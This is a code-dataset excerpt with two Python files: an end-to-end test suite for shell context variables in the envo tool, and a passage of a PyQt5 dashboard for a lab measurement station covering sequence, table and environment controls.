+{"seq_id": "23317625372", "text": "from pathlib import Path\nfrom time import sleep\n\nfrom tests.e2e import utils\n\n\nclass TestShellContext(utils.TestBase):\n def test_simple_context(self, shell):\n context = {\n \"str_var\": \"str test value\",\n \"int_var\": 8,\n \"dict_var\": {\"nested_var\": \"some nested value\"},\n }\n utils.add_shell_context(context)\n e = shell.start()\n\n e.prompt().eval()\n\n shell.sendline(\"print(str_var)\")\n e.output(r\"str test value\\n\").prompt().eval()\n\n shell.sendline(\"print(int_var)\")\n e.output(r\"8\\n\").prompt().eval()\n\n shell.sendline('print(dict_var[\"nested_var\"])')\n e.output(r\"some nested value\\n\").prompt().eval()\n\n shell.exit()\n e.exit().eval()\n\n def test_multiple_contexts(self, shell):\n context1 = {\n \"str_var1\": \"str test1 value\",\n \"int_var1\": 8,\n }\n utils.add_shell_context(context1, name=\"context1\")\n\n context2 = {\n \"str_var2\": \"str test2 value\",\n \"int_var2\": 28,\n }\n utils.add_shell_context(context2, name=\"context2\")\n\n e = shell.start()\n\n e.prompt().eval()\n\n shell.sendline(\"print(str_var1)\")\n e.output(r\"str test1 value\\n\").prompt().eval()\n\n shell.sendline(\"print(int_var1)\")\n e.output(r\"8\\n\").prompt().eval()\n\n shell.sendline(\"print(str_var2)\")\n e.output(r\"str test2 value\\n\").prompt().eval()\n\n shell.sendline(\"print(int_var2)\")\n e.output(r\"28\\n\").prompt().eval()\n\n shell.exit()\n e.exit().eval()\n\n def test_contexts_inheritance(self, shell):\n context1 = {\n \"str_var1\": \"str test1 value\",\n \"int_var1\": 8,\n \"other_var\": \"other var value\",\n }\n utils.add_shell_context(context1, name=\"context1\")\n\n context2 = {\n \"str_var2\": \"str test2 value\",\n \"str_var1\": \"str test1 new value\",\n \"int_var2\": 28,\n }\n utils.add_shell_context(context2, name=\"context2\", file=Path(\"env_test.py\"))\n e = shell.start()\n\n e.prompt().eval()\n\n shell.sendline(\"print(str_var1)\")\n e.output(r\"str test1 new value\\n\").prompt().eval()\n\n shell.sendline(\"print(int_var1)\")\n e.output(r\"8\\n\").prompt().eval()\n\n shell.sendline(\"print(str_var2)\")\n e.output(r\"str test2 value\\n\").prompt().eval()\n\n shell.sendline(\"print(int_var2)\")\n e.output(r\"28\\n\").prompt().eval()\n\n shell.sendline(\"print(other_var)\")\n e.output(r\"other var value\\n\").prompt().eval()\n\n shell.exit()\n e.exit().eval()\n\n def test_slow_context(self, shell):\n utils.add_command(\n \"\"\"\n @shell_context\n def some_context(self) -> Dict[str, Any]:\n from time import sleep\n sleep(4.0)\n return {\"slow_var\": \"slow var value\"}\n \"\"\"\n )\n shell.start(False)\n e = shell.expecter\n\n e.prompt(utils.PromptState.LOADING)\n\n shell.sendline(\"print(slow_var)\")\n e.output(r\"NameError: name 'slow_var' is not defined\\n\")\n e.prompt(utils.PromptState.MAYBE_LOADING).eval()\n\n e.expected.pop()\n e.prompt().eval()\n\n shell.sendline(\"print(slow_var)\")\n e.output(r\"slow var value\\n\").prompt().eval()\n\n shell.exit()\n e.exit().eval()\n\n def test_error_in_context(self, shell):\n utils.add_command(\n \"\"\"\n @shell_context\n def some_context(self) -> Dict[str, Any]:\n return {\"var\": 1/0}\n \"\"\"\n )\n shell.start(False)\n e = shell.expecter\n\n e.output(fr\".*{ZeroDivisionError.__name__}.*\")\n e.prompt().eval()\n\n shell.sendline(\"var\")\n e.output(r\".*not found.*\")\n\n shell.exit()\n e.exit().eval()\n\n def test_context_shadowing(self, shell):\n utils.add_command(\n \"\"\"\n @shell_context\n def __some_context(self) -> Dict[str, Any]:\n return {\"cake\": 
\"Sponge\"}\n \"\"\",\n Path(\"env_comm.py\"),\n )\n\n utils.add_command(\n \"\"\"\n @shell_context\n def __some_context(self) -> Dict[str, Any]:\n return {\"flavor\": \"Caramel\"}\n \"\"\",\n Path(\"env_test.py\"),\n )\n\n shell.start()\n e = shell.expecter\n\n e.prompt().eval()\n\n shell.sendline(\"flavor\")\n e.output(fr\"'Caramel'\\n\")\n e.prompt().eval()\n\n shell.sendline(\"cake\")\n e.output(fr\"'Sponge'\\n\")\n e.prompt().eval()\n\n shell.exit()\n e.exit().eval()\n", "repo_name": "reloadware/envo", "sub_path": "tests/e2e/test_shell_context.py", "file_name": "test_shell_context.py", "file_ext": "py", "file_size_in_byte": 4703, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tests.e2e.utils.TestBase", "line_number": 7, "usage_type": "attribute"}, {"api_name": "tests.e2e.utils", "line_number": 7, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_shell_context", "line_number": 14, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 14, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_shell_context", "line_number": 36, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 36, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_shell_context", "line_number": 42, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 42, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_shell_context", "line_number": 69, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 69, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_shell_context", "line_number": 76, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 76, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "call"}, {"api_name": "tests.e2e.utils.add_command", "line_number": 100, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 100, "usage_type": "name"}, {"api_name": "tests.e2e.utils.PromptState", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tests.e2e.utils", "line_number": 112, "usage_type": "name"}, {"api_name": "tests.e2e.utils.PromptState", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tests.e2e.utils", "line_number": 116, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_command", "line_number": 128, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 128, "usage_type": "name"}, {"api_name": "tests.e2e.utils.add_command", "line_number": 148, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 148, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 154, "usage_type": "call"}, {"api_name": "tests.e2e.utils.add_command", "line_number": 157, "usage_type": "call"}, {"api_name": "tests.e2e.utils", "line_number": 157, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 163, "usage_type": "call"}]}
+{"seq_id": "11949540277", "text": "import json\nimport logging\nimport math\nimport os\nimport time\nimport threading\nimport webbrowser\nfrom typing import Optional\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nimport comet\nfrom comet.process import ProcessMixin\nfrom ..workers.measure import MeasureWorker\nfrom .components import (\n CalibrationWidget,\n OperatorWidget,\n PositionWidget,\n ToggleButton,\n WorkingDirectoryWidget,\n)\nfrom ..core import config\nfrom ..core.position import Position\nfrom ..core.utils import make_path\nfrom .sequence import (\n GroupTreeItem,\n ContactTreeItem,\n EditSamplesDialog,\n MeasurementTreeItem,\n SequenceRootTreeItem,\n SampleTreeItem,\n SequenceTreeWidget,\n StartSequenceDialog,\n)\nfrom .sequencemanager import load_all_sequences\nfrom ..settings import settings\nfrom .alignment import AlignmentDialog, safe_z_position\nfrom .environmentwidget import EnvironmentWidget\nfrom .measurementwidget import MeasurementWidget\nfrom ..utils import caldone_valid\n\nlogger = logging.getLogger(__name__)\n\n\nclass SequenceWidget(QtWidgets.QGroupBox):\n\n def __init__(self, parent: Optional[QtWidgets.QWidget] = None) -> None:\n super().__init__(parent)\n\n self.setTitle(\"Sequence\")\n self.sequenceTreeWidget = SequenceTreeWidget(self)\n self.sequenceTreeWidget.setMinimumWidth(360)\n\n self.startButton = QtWidgets.QPushButton(self)\n self.startButton.setText(\"Start\")\n self.startButton.setToolTip(\"Start measurement sequence.\")\n self.startButton.setStyleSheet(\"QPushButton:enabled{color:green;font-weight:bold;}\")\n\n self.stopButton = QtWidgets.QPushButton(self)\n self.stopButton.setText(\"Stop\")\n self.stopButton.setToolTip(\"Stop measurement sequence.\")\n self.stopButton.setEnabled(False)\n self.stopButton.setStyleSheet(\"QPushButton:enabled{color:red;font-weight:bold;}\")\n\n self.resetButton = QtWidgets.QPushButton(self)\n self.resetButton.setText(\"Reset\")\n self.resetButton.setToolTip(\"Reset measurement sequence state.\")\n\n self.editButton = QtWidgets.QPushButton(self)\n self.editButton.setText(\"Edit\")\n self.editButton.setToolTip(\"Quick edit properties of sequence items.\",)\n\n self.reloadConfigButton = QtWidgets.QToolButton(self)\n\n self.addSampleButton = QtWidgets.QToolButton(self)\n\n self.addGroupButton = QtWidgets.QToolButton(self)\n\n self.removeSampleButton = QtWidgets.QToolButton(self)\n\n self.collapseAllSamplesButton = QtWidgets.QToolButton(self)\n self.collapseAllSamplesButton.triggered.connect(self.collapseAllSamples)\n\n self.buttonLayout = QtWidgets.QHBoxLayout()\n self.buttonLayout.addWidget(self.startButton)\n self.buttonLayout.addWidget(self.stopButton)\n self.buttonLayout.addWidget(self.resetButton)\n self.buttonLayout.addWidget(self.editButton)\n self.buttonLayout.addWidget(self.reloadConfigButton)\n self.buttonLayout.addWidget(self.addSampleButton)\n self.buttonLayout.addWidget(self.addGroupButton)\n self.buttonLayout.addWidget(self.removeSampleButton)\n self.buttonLayout.addWidget(self.collapseAllSamplesButton)\n\n layout = QtWidgets.QVBoxLayout(self)\n layout.addWidget(self.sequenceTreeWidget)\n layout.addLayout(self.buttonLayout)\n\n def readSettings(self):\n samples = settings.settings.get(\"sequence_samples\", [])\n self.sequenceTreeWidget.clear()\n for kwargs in samples:\n if \"group_samples\" in kwargs:\n item = GroupTreeItem()\n else:\n item = SampleTreeItem()\n self.sequenceTreeWidget.addTopLevelItem(item)\n item.setExpanded(False)\n try:\n item.from_settings(**kwargs)\n except Exception as exc:\n 
logger.error(exc)\n if self.sequenceTreeWidget.topLevelItemCount():\n self.sequenceTreeWidget.setCurrentItem(self.sequenceTreeWidget.topLevelItem(0))\n self.sequenceTreeWidget.resizeColumns()\n\n def writeSettings(self):\n sequence_samples = [sample.to_settings() for sample in self.sequenceTreeWidget.sequenceItems()]\n settings.settings[\"sequence_samples\"] = sequence_samples\n\n def setLocked(self, locked: bool) -> None:\n self.startButton.setEnabled(not locked)\n self.stopButton.setEnabled(locked)\n self.resetButton.setEnabled(not locked)\n self.editButton.setEnabled(not locked)\n self.reloadConfigButton.setEnabled(not locked)\n self.addSampleButton.setEnabled(not locked)\n self.removeSampleButton.setEnabled(not locked)\n self.collapseAllSamplesButton.setEnabled(not locked)\n self.sequenceTreeWidget.setLocked(locked)\n\n def stop(self):\n self.stopButton.setEnabled(False)\n\n def reloadConfig(self) -> None:\n result = QtWidgets.QMessageBox.question(self, \"Reload Configuration\", \"Do you want to reload sequence configurations from file?\")\n if result == QtWidgets.QMessageBox.Yes:\n progress = QtWidgets.QProgressDialog(self)\n progress.setLabelText(\"Reloading sequences...\")\n progress.setMaximum(len(self.sequenceTreeWidget.sampleItemsOnly()))\n progress.setCancelButton(None)\n\n def callback():\n try:\n for sample_item in self.sequenceTreeWidget.sampleItemsOnly():\n progress.setValue(progress.value() + 1)\n if sample_item.sequence:\n filename = sample_item.sequence.filename\n sequence = config.load_sequence(filename)\n sample_item.load_sequence(sequence)\n finally:\n progress.close()\n\n QtCore.QTimer.singleShot(200, callback)\n progress.exec()\n\n def collapseAllSamples(self) -> None:\n\n def collapse(item):\n if isinstance(item, (SampleTreeItem, ContactTreeItem, MeasurementTreeItem)):\n item.setExpanded(False)\n for index in range(item.childCount()):\n collapse(item.child(index))\n\n collapse(self.sequenceTreeWidget.invisibleRootItem())\n\n def addSampleItem(self) -> None:\n item = SampleTreeItem()\n item.setNameInfix(\"Unnamed Sample\")\n item.setEnabled(True)\n self.sequenceTreeWidget.addSampleItem(item)\n self.sequenceTreeWidget.setCurrentItem(item)\n self.sequenceTreeWidget.resizeColumns()\n\n def addGroupItem(self) -> None:\n item = GroupTreeItem()\n item.setName(\"Unnamed Group\")\n item.setEnabled(True)\n self.sequenceTreeWidget.addGroupItem(item)\n self.sequenceTreeWidget.setCurrentItem(item)\n self.sequenceTreeWidget.resizeColumns()\n\n def removeCurrentSampleItem(self) -> None:\n item = self.sequenceTreeWidget.currentItem()\n if isinstance(item, SampleTreeItem):\n result = QtWidgets.QMessageBox.question(self, \"Remove Sample\", f\"Do you want to remove sample {item.name()!r}?\")\n if result == QtWidgets.QMessageBox.Yes:\n self._removeSequenceItem(item)\n elif isinstance(item, GroupTreeItem):\n result = QtWidgets.QMessageBox.question(self, \"Remove Group\", f\"Do you want to remove group {item.name()!r}?\")\n if result == QtWidgets.QMessageBox.Yes:\n self._removeSequenceItem(item)\n\n def _removeSequenceItem(self, item):\n parent = item.parent()\n if parent is None:\n index = self.sequenceTreeWidget.indexOfTopLevelItem(item)\n self.sequenceTreeWidget.takeTopLevelItem(index)\n else:\n index = parent.indexOfChild(item)\n parent.takeChild(index)\n\n\nclass TableControlWidget(QtWidgets.QGroupBox):\n\n joystickToggled = QtCore.pyqtSignal(bool)\n controlClicked = QtCore.pyqtSignal()\n\n def __init__(self, parent: Optional[QtWidgets.QWidget] = None) -> None:\n 
super().__init__(parent)\n self.setTitle(\"Table\")\n self.setCheckable(True)\n\n self.joystickButton: ToggleButton = ToggleButton(self)\n self.joystickButton.setText(\"Joystick\")\n self.joystickButton.setToolTip(\"Toggle table joystick\")\n self.joystickButton.toggled.connect(self.joystickToggled.emit)\n\n self.positionWidget = PositionWidget()\n\n self.calibrationWidget = CalibrationWidget()\n\n self.alignmentButton = QtWidgets.QPushButton(self)\n self.alignmentButton.setIcon(QtGui.QIcon(make_path(\"assets\", \"icons\", \"alignment.svg\")))\n self.alignmentButton.setText(\"Alignment...\")\n self.alignmentButton.setToolTip(\"Open table controls dialog.\")\n self.alignmentButton.clicked.connect(self.controlClicked.emit)\n\n # Layout\n\n layout = QtWidgets.QGridLayout(self)\n layout.addWidget(self.positionWidget, 0, 0, 4, 1)\n layout.addWidget(self.calibrationWidget, 0, 1, 4, 1)\n layout.addWidget(self.alignmentButton, 1, 3)\n layout.addWidget(self.joystickButton, 2, 3)\n layout.setColumnStretch(2, 1)\n\n # Callbacks\n self._joystick_limits = [0, 0, 0]\n self._calibration_valid: bool = False\n\n def isCalibrationValid(self) -> bool:\n return self._calibration_valid\n\n def setJoystickEnabled(self, enabled: bool) -> None:\n self.joystickButton.setChecked(enabled)\n\n def setPosition(self, position: Position) -> None:\n self.positionWidget.setPosition(position)\n limits = self._joystick_limits\n enabled = position.x <= limits[0] and position.y <= limits[1] and position.z <= limits[2]\n self.joystickButton.setEnabled(enabled and self._calibration_valid)\n\n def setCalibration(self, position: Position) -> None:\n self.calibrationWidget.setCalibration(position)\n self._calibration_valid = caldone_valid(position)\n\n def readSettings(self) -> None:\n use_table = settings.settings.get(\"use_table\") or False\n self.setChecked(use_table)\n self._joystick_limits = settings.table_joystick_maximum_limits\n\n\nclass EnvironmentControlWidget(QtWidgets.QGroupBox):\n\n def __init__(self, parent: Optional[QtWidgets.QWidget] = None) -> None:\n super().__init__(parent)\n self.setTitle(\"Environment Box\")\n self.setCheckable(True)\n\n self.laserSensorButton: ToggleButton = ToggleButton(self)\n self.laserSensorButton.setText(\"Laser\")\n self.laserSensorButton.setToolTip(\"Toggle laser\")\n\n self.boxLightButton: ToggleButton = ToggleButton(self)\n self.boxLightButton.setText(\"Box Light\")\n self.boxLightButton.setToolTip(\"Toggle box light\")\n\n self.microscopeLightButton: ToggleButton = ToggleButton(self)\n self.microscopeLightButton.setText(\"Mic Light\")\n self.microscopeLightButton.setToolTip(\"Toggle microscope light\")\n\n self.microscopeCameraButton: ToggleButton = ToggleButton(self)\n self.microscopeCameraButton.setText(\"Mic Cam\")\n self.microscopeCameraButton.setToolTip(\"Toggle microscope camera power\")\n\n self.microscopeControlButton: ToggleButton = ToggleButton(self)\n self.microscopeControlButton.setText(\"Mic Ctrl\")\n self.microscopeControlButton.setToolTip(\"Toggle microscope control\")\n\n self.probecardLightButton: ToggleButton = ToggleButton(self)\n self.probecardLightButton.setText(\"PC Light\")\n self.probecardLightButton.setToolTip(\"Toggle probe card light\")\n\n self.probecardCameraButton: ToggleButton = ToggleButton(self)\n self.probecardCameraButton.setText(\"PC Cam\")\n self.probecardCameraButton.setToolTip(\"Toggle probe card camera power\")\n\n self.pidControlButton: ToggleButton = ToggleButton(self)\n self.pidControlButton.setText(\"PID Control\")\n 
self.pidControlButton.setToolTip(\"Toggle PID control\")\n\n layout = QtWidgets.QGridLayout(self)\n layout.addWidget(self.laserSensorButton, 0, 0)\n layout.addWidget(self.microscopeCameraButton, 1, 0)\n layout.addWidget(self.boxLightButton, 0, 1)\n layout.addWidget(self.probecardCameraButton, 1, 1)\n layout.addWidget(self.microscopeLightButton, 0, 2)\n layout.addWidget(self.microscopeControlButton, 1, 2)\n layout.addWidget(self.probecardLightButton, 0, 3)\n layout.addWidget(self.pidControlButton, 1, 3)\n\n def updateLaserSensorState(self, state: bool) -> None:\n self.laserSensorButton.setChecked(state)\n\n def updateBoxLightState(self, state: bool) -> None:\n self.boxLightButton.setChecked(state)\n\n def updateMicroscopeLightState(self, state: bool) -> None:\n self.microscopeLightButton.setChecked(state)\n\n def updateMicroscopeCameraState(self, state: bool) -> None:\n self.microscopeCameraButton.setChecked(state)\n\n def updateMicroscopeControlState(self, state: bool) -> None:\n self.microscopeControlButton.setChecked(state)\n\n def updateProbecardLightState(self, state: bool) -> None:\n self.probecardLightButton.setChecked(state)\n\n def updateProbecardCameraState(self, state: bool) -> None:\n self.probecardCameraButton.setChecked(state)\n\n def updatePidControlState(self, state: bool) -> None:\n self.pidControlButton.setChecked(state)\n\n\nclass AnimatedLabel(QtWidgets.QLabel):\n\n def __init__(self, parent):\n super().__init__(parent)\n self.animation = QtCore.QVariantAnimation()\n self.animation.setStartValue(QtGui.QColor('yellow'))\n self.animation.setKeyValueAt(0.5, QtGui.QColor('orange'))\n self.animation.setEndValue(QtGui.QColor('yellow'))\n self.animation.setDuration(4000)\n self.animation.valueChanged.connect(self.updateColor)\n self.animation.setLoopCount(-1)\n self.animation.start()\n\n def updateColor(self, color):\n palette = self.palette()\n palette.setColor(self.backgroundRole(), QtGui.QColor(color))\n self.setPalette(palette)\n self.setAutoFillBackground(True)\n\n\nclass Dashboard(QtWidgets.QWidget, ProcessMixin):\n\n sample_count = 4\n\n messageChanged = QtCore.pyqtSignal(str)\n progressChanged = QtCore.pyqtSignal(int, int)\n started = QtCore.pyqtSignal()\n aborting = QtCore.pyqtSignal()\n finished = QtCore.pyqtSignal()\n failed = QtCore.pyqtSignal(Exception, object)\n\n def __init__(self, station, plugins, parent: Optional[QtWidgets.QWidget] = None) -> None:\n super().__init__(parent)\n self.station = station\n self.plugins = plugins\n\n self.measure_thread = None\n\n self.noticeLabel = AnimatedLabel(self)\n self.noticeLabel.setText(\"Temporary Probecard Z-Limit applied. 
Revert after finishing current measurements.\")\n # self.noticeLabel.setStyleSheet(\"QLabel{color: black; background-color: yellow; padding: 8px; border-radius: 0;}\")\n self.noticeLabel.setStyleSheet(\"QLabel{color: black; padding: 8px; border-radius: 0;}\")\n self.noticeLabel.setVisible(False)\n self.noticeLabel.animation.start()\n\n self.sequenceControlWidget = SequenceWidget(self)\n\n self.sequenceTreeWidget = self.sequenceControlWidget.sequenceTreeWidget\n self.sequenceTreeWidget.currentItemChanged.connect(self.on_tree_selected)\n self.sequenceTreeWidget.itemDoubleClicked.connect(self.on_tree_double_clicked)\n\n # Environment Controls\n\n self.environmentControlWidget = EnvironmentControlWidget(self)\n self.environmentControlWidget.toggled.connect(self.on_environment_groupbox_toggled)\n self.environmentControlWidget.laserSensorButton.toggled.connect(self.on_laser_sensor_toggled)\n self.environmentControlWidget.boxLightButton.toggled.connect(self.on_box_light_toggled)\n self.environmentControlWidget.microscopeLightButton.toggled.connect(self.on_microscope_light_toggled)\n self.environmentControlWidget.microscopeCameraButton.toggled.connect(self.on_microscope_camera_toggled)\n self.environmentControlWidget.microscopeControlButton.toggled.connect(self.on_microscope_control_toggled)\n self.environmentControlWidget.probecardLightButton.toggled.connect(self.on_probecard_light_toggled)\n self.environmentControlWidget.probecardCameraButton.toggled.connect(self.on_probecard_camera_toggled)\n self.environmentControlWidget.pidControlButton.toggled.connect(self.on_pid_control_toggled)\n\n # Table controls\n\n self.tableControlWidget = TableControlWidget(self)\n self.tableControlWidget.toggled.connect(self.on_table_groupbox_toggled)\n self.tableControlWidget.joystickToggled.connect(self.on_table_joystick_toggled)\n self.tableControlWidget.controlClicked.connect(self.on_table_control_clicked)\n\n # Operator\n\n self.operatorWidget = OperatorWidget(self)\n\n # Working directory\n\n self.outputWidget = WorkingDirectoryWidget(self)\n self.outputWidget.setTitle(\"Working Directory\")\n\n # Controls\n\n self.controlWidget = QtWidgets.QWidget(self)\n\n controlWidgetLayout = QtWidgets.QGridLayout(self.controlWidget)\n controlWidgetLayout.setContentsMargins(0, 0, 0, 0)\n controlWidgetLayout.addWidget(self.sequenceControlWidget, 0, 0, 1, 2)\n controlWidgetLayout.addWidget(self.tableControlWidget, 1, 0, 1, 2)\n controlWidgetLayout.addWidget(self.environmentControlWidget, 2, 0, 1, 2)\n controlWidgetLayout.addWidget(self.operatorWidget, 3, 0, 1, 1)\n controlWidgetLayout.addWidget(self.outputWidget, 3, 1, 1, 1)\n controlWidgetLayout.setRowStretch(0, 1)\n controlWidgetLayout.setColumnStretch(0, 3)\n controlWidgetLayout.setColumnStretch(1, 7)\n\n # Tabs\n\n self.measurementWidget = MeasurementWidget()\n self.measurementWidget.restoreDefaults.connect(self.restoreDefaults)\n\n self.environmentWidget = EnvironmentWidget()\n\n self.panels = self.measurementWidget.panels\n self.panels.sampleChanged.connect(lambda _: self.sequenceTreeWidget.resizeColumns())\n self.panels.groupChanged.connect(lambda _: self.sequenceTreeWidget.resizeColumns())\n\n # Tabs\n\n self.tabWidget = QtWidgets.QTabWidget(self)\n self.tabWidget.addTab(self.measurementWidget, \"Measurement\")\n self.tabWidget.addTab(self.environmentWidget, \"Environment\")\n\n # Layout\n\n self.splitter = QtWidgets.QSplitter(self)\n self.splitter.setChildrenCollapsible(False)\n self.splitter.addWidget(self.controlWidget)\n self.splitter.addWidget(self.tabWidget)\n 
self.splitter.setStretchFactor(0, 4)\n self.splitter.setStretchFactor(1, 9)\n\n layout = QtWidgets.QVBoxLayout(self)\n layout.setContentsMargins(0, 0, 0, 0)\n layout.setSpacing(0)\n layout.addWidget(self.noticeLabel, 0)\n self.splitterWrapper = QtWidgets.QWidget()\n layout.addWidget(self.splitterWrapper, 1)\n wrapperLayout = QtWidgets.QVBoxLayout(self.splitterWrapper)\n wrapperLayout.addWidget(self.splitter)\n\n # Setup process callbacks\n\n self.environ_worker = self.station.environ_worker\n self.environ_worker.pc_data_updated = self.setPCData\n self.environ_worker.failed = self.failed.emit\n\n self.table_worker = self.station.table_worker\n self.table_worker.joystick_changed = self.on_table_joystick_changed\n self.table_worker.position_changed = self.on_table_position_changed\n self.table_worker.caldone_changed = self.on_table_calibration_changed\n self.table_worker.failed = self.failed.emit\n\n self.contact_quality_process = self.processes.get(\"contact_quality\")\n self.contact_quality_process.failed = self.failed.emit\n\n def readSettings(self):\n settings_ = QtCore.QSettings()\n settings_.beginGroup(\"dashboard\")\n self.splitter.restoreState(settings_.value(\"splitterState\", QtCore.QByteArray(), QtCore.QByteArray))\n settings_.endGroup()\n\n self.sequenceControlWidget.readSettings()\n use_environ = settings.settings.get(\"use_environ\", False)\n self.environmentControlWidget.setChecked(use_environ)\n self.tableControlWidget.readSettings()\n self.operatorWidget.readSettings()\n self.outputWidget.readSettings()\n\n def writeSettings(self):\n settings_ = QtCore.QSettings()\n settings_.beginGroup(\"dashboard\")\n settings_.setValue(\"splitterState\", self.splitter.saveState())\n settings_.endGroup()\n\n self.sequenceControlWidget.writeSettings()\n settings.settings[\"use_environ\"] = self.isEnvironmentEnabled()\n settings.settings[\"use_table\"] = self.isTableEnabled()\n self.operatorWidget.writeSettings()\n self.outputWidget.writeSettings()\n\n def sequenceItems(self) -> list:\n items = []\n for index in range(self.sequenceTreeWidget.topLevelItemCount()):\n item = self.sequenceTreeWidget.topLevelItem(index)\n items.append(item)\n return items\n\n def clearSequence(self) -> None:\n self.sequenceTreeWidget.clear()\n\n def addSequenceItem(self, item: SampleTreeItem) -> None:\n self.sequenceTreeWidget.addTopLevelItem(item)\n\n def sample_name(self):\n \"\"\"Return sample name.\"\"\"\n item = self.sequenceTreeWidget.currentItem()\n if isinstance(item, MeasurementTreeItem):\n return item.contact.sample.name()\n if isinstance(item, ContactTreeItem):\n return item.sample.name()\n if isinstance(item, SampleTreeItem):\n return item.name()\n return \"\"\n\n def sampleType(self) -> str:\n \"\"\"Return current sample type.\"\"\"\n item = self.sequenceTreeWidget.currentItem()\n if isinstance(item, MeasurementTreeItem):\n return item.contact.sample.sampleType()\n if isinstance(item, ContactTreeItem):\n return item.sample.sampleType()\n if isinstance(item, SampleTreeItem):\n return item.sampleType()\n return \"\"\n\n def table_position(self):\n \"\"\"Return table position in millimeters as tuple. 
If the table is not available,\n return (0., 0., 0.).\n \"\"\"\n if self.isTableEnabled():\n return self.table_worker.get_cached_position()\n return Position()\n\n def isEnvironmentEnabled(self) -> bool:\n \"\"\"Return True if environment box enabled.\"\"\"\n return self.environmentControlWidget.isChecked()\n\n def isTableEnabled(self) -> bool:\n \"\"\"Return True if table control enabled.\"\"\"\n return self.tableControlWidget.isChecked()\n\n def currentOperator(self) -> str:\n \"\"\"Return current operator.\"\"\"\n return self.operatorWidget.currentOperator()\n\n def outputDir(self) -> str:\n \"\"\"Return output base path.\"\"\"\n return os.path.realpath(self.outputWidget.currentLocation())\n\n def create_output_dir(self):\n \"\"\"Create the output directory for the sample if it does not exist, and return\n the directory path.\n \"\"\"\n output_dir = self.outputDir()\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n return output_dir\n\n def write_logfiles(self):\n return bool(settings.settings.get(\"write_logfiles\", True))\n\n # Callbacks\n\n def setControlsLocked(self, locked: bool) -> None:\n \"\"\"Lock or unlock dashboard controls.\"\"\"\n self.environmentControlWidget.setEnabled(not locked)\n self.tableControlWidget.setEnabled(not locked)\n self.sequenceControlWidget.setLocked(locked)\n self.outputWidget.setEnabled(not locked)\n self.operatorWidget.setEnabled(not locked)\n self.measurementWidget.setLocked(locked)\n self.plugins.handle(\"lock_controls\", locked)\n\n def setNoticeVisible(self, visible: bool) -> None:\n self.noticeLabel.setVisible(visible)\n if visible:\n self.noticeLabel.animation.start()\n else:\n self.noticeLabel.animation.stop()\n\n # Sequence control\n\n def on_tree_selected(self, item, previous) -> None:\n if not self.operatorWidget.isEnabled():\n return # TODO\n self.panels.store()\n self.panels.unmount()\n self.panels.clear()\n self.panels.hide()\n self.measurementWidget.setControlsVisible(False)\n if isinstance(item, GroupTreeItem):\n panel = self.panels.get(\"group\")\n panel.setVisible(True)\n panel.mount(item)\n if isinstance(item, SampleTreeItem):\n panel = self.panels.get(\"sample\")\n panel.setVisible(True)\n panel.mount(item)\n if isinstance(item, ContactTreeItem):\n panel = self.panels.get(\"contact\")\n panel.setVisible(True)\n panel.mount(item)\n if isinstance(item, MeasurementTreeItem):\n panel = self.panels.get(item.item_type)\n if panel:\n panel.setVisible(True)\n panel.mount(item)\n self.measurementWidget.setControlsVisible(True)\n # Show measurement tab\n self.tabWidget.setCurrentWidget(self.measurementWidget)\n\n def on_tree_double_clicked(self, item, index):\n if self.operatorWidget.isEnabled(): # TODO\n self.on_start()\n\n # Contact table controls\n\n def moveTable(self, contact) -> None:\n if self.isTableEnabled():\n self.setControlsLocked(True)\n x, y, z = contact.position\n self.table_worker.message_changed = lambda message: self.messageChanged.emit(message)\n self.table_worker.progress_changed = lambda a, b: self.progressChanged.emit(a, b)\n self.table_worker.absolute_move_finished = self.on_table_finished\n self.table_worker.safe_absolute_move(x, y, z)\n\n def contactTable(self, contact) -> None:\n if self.isTableEnabled():\n self.setControlsLocked(True)\n x, y, z = contact.position\n z = safe_z_position(z)\n self.table_worker.message_changed = lambda message: self.messageChanged.emit(message)\n self.table_worker.progress_changed = lambda a, b: self.progressChanged.emit(a, b)\n self.table_worker.absolute_move_finished = self.on_table_finished\n 
self.table_worker.safe_absolute_move(x, y, z)\n\n def on_table_finished(self):\n self.table_worker.absolute_move_finished = None\n current_item = self.sequenceTreeWidget.currentItem()\n if isinstance(current_item, GroupTreeItem):\n panel = self.panels.get(\"group\")\n panel.setVisible(True)\n panel.mount(current_item)\n if isinstance(current_item, SampleTreeItem):\n panel = self.panels.get(\"sample\")\n panel.setVisible(True)\n panel.mount(current_item)\n if isinstance(current_item, ContactTreeItem):\n panel = self.panels.get(\"contact\")\n panel.setVisible(True)\n panel.mount(current_item)\n self.setControlsLocked(False)\n\n def on_start_all(self):\n sample_items = SequenceRootTreeItem(self.sequenceTreeWidget.sequenceItems())\n dialog = StartSequenceDialog(self)\n dialog.setMessage(\"Are you sure you want to start all enabled sequences for all enabled samples/groups? \")\n dialog.setTableEnabled(self.isTableEnabled())\n self.operatorWidget.writeSettings()\n self.outputWidget.writeSettings()\n dialog.readSettings()\n if dialog.exec() == dialog.Accepted:\n dialog.writeSettings()\n self.operatorWidget.readSettings()\n self.outputWidget.readSettings()\n self._on_start(\n sample_items,\n move_to_contact=dialog.isMoveToContact(),\n move_to_after_position=dialog.isMoveToPosition()\n )\n\n def startMeasurement(self, item: MeasurementTreeItem) -> None:\n contact_item = item.contact\n message = f\"Are you sure you want to run measurement {item.name()!r} for {contact_item.name()!r}?\"\n result = 